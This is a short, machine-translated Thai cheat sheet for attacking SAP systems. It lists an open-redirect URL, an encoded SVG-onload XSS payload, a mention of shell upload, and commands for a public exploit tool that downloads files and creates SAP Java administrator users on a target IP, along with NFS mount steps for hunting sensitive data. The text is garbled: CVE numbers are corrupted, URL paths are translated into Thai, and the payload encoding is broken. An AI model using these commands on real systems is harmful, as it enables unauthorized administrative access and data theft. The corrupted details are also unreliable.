บิสวิลลาห์
สำหรับการดำเนินการ pentest คุณควรปรับใช้ระบบ SAP บนเครือข่ายของคุณ
https: // host/sap/public/bc/icf/logoff? redirecturl = maliciousurl
http: // host: พอร์ต/startpage
http: // โฮสต์: พอร์ต/sap/สาธารณะ/ข้อมูล
http: // โฮสต์: พอร์ต/sap/สาธารณะ/ข้อมูล
ค้นหา/sapirexthelp https: // localhost/sapirexthelp
https: // host/sapirexthelp/random/%22%3e%3C%53%56%47%20%4F%4E%4C%4F%41%44%3D%26%23%39%37%26%23%31 %30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%23%78%36%34%26%23%78%36%66%26%23%78%36%36% %33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%238%78%36%65%26%23%78%37%34%26%23%78%32%65%26%26% %23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%238%36%65%29%
ระบบข้อมูล SAP 1.0 การอัปโหลดเชลล์
CVE-20122-22536 (ICMAD SAP)
ช่องโหว่ SAP Recon (CVE-20120-6287, CVE-20120-6286)
https://github.com/chipik/sap_recon
ดาวน์โหลดไฟล์ zip
Python Recon.py -H 172.16.30.8 -F /1111.zip
สร้างผู้ใช้ SAP Java
Python Recon.py -H 172.16.30.8 -U
สร้างผู้ใช้ SAP Java Administrator
Python Recon.py -H 172.16.30.8 -a
sslscan
NFS-LS NFS: // โฮสต์/เมานต์
mkdir mnt && mount -t nfs โฮสต์:/mount ./mnt
ขอให้โชคดีค้นหาข้อมูลที่ละเอียดอ่อน
ฉันกำลังมองหาเครื่องเสมือนของ SAP หรือคอนเทนเนอร์สำหรับการจำลองแบบเพนต์ที่สุดหากคุณมีข้อมูลโปรดกรุณาฉัน @linkedin)
การแบ่งปันคือการดูแล
كماقالصلىاللهليهوسلم: "خيرالناسنفمللناس"